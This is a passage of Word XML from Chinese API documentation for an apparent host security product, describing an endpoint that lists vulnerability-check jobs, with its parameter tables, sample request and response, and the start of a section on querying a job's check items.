        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60058840" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0BDB6B66" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C71AE5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="703A7AD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E87D3F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobid，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="790A7BC7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BB3D229" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C92723F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59359E65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobName，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1C7564F9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="223B817F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FE3B6E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DEBDC76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业类型：1：全局作业 2：用户作业，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="175CBDFB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EAF7095" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B7EF2F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="203B208E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>每页数量：默认为50，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="701A60B6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BF10A38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4921DD7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="333AC167" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>当前页，从0开始，默认为0，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EFD0D38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF0F4CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/linux/list</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobType":2,"page":0,"size":30}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EB9BE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C81746" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "jobId": "5c3d7c7a7d761b6b1c9048fd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "jobType": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "ceshi",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "status": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "realmName": "全部主机",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "lastExecuteTime": 1547797225,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "taskCount": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "createTime": 1547533434,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "cronEnabled": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "cron": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executeStatus": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31C107"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753"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="5893"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="76E0277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5C71943" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3220F283" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="350456E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="028657BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7988E4CC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10565F6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C9740FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31A54829" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CCE1859" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2ED5C328" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13BE577B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="082EB66B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0318EB36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E041CE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2625A70F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59AC9C0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DEB028D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BCDA9AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BF30C25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="136156E0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D86A618" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="019EB0AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FEC9B0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73049F54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否启用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="46E20D46" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="184E7E82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1657FE5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48C63E61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7853EE18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5DD82CEA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69240853" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastExecuteTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26604673" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="567B6BA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57DD3F74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="591793F9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="493FFCCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36D21E9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35ED3438" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67F9113F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业下检测项数量（极少数情况下自定义作业可能包含已删除的无效检测项，真实数量以接口4.5.14为准 ）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="29969F95" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78949B7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>createTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="781DD0B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ADBFED4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54CBCD7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="062B2172" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1274DDF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28730C9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B7C75D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05681CF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="58DE5D04" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FAEC85D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F49693C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E56E748" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56F38FBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B15B0B1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65A338FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41CE609C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="255D0F93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E2B3824" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行状态; 0：未开始执行，1：排队执行，2：正在执行，3：执行成功，4：执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A285AA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="作业下检测项信息查询"/>
      <w:bookmarkEnd w:id="124"/>
      <w:r>
        <w:t>作业下检测项信息查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2929B4A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4003F5D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/{linux|win}/tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FAC8B0"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974"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="50D2D7A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9F1FFC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73ED2D4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CF01141" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="36150C12" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43A746C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="035333D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
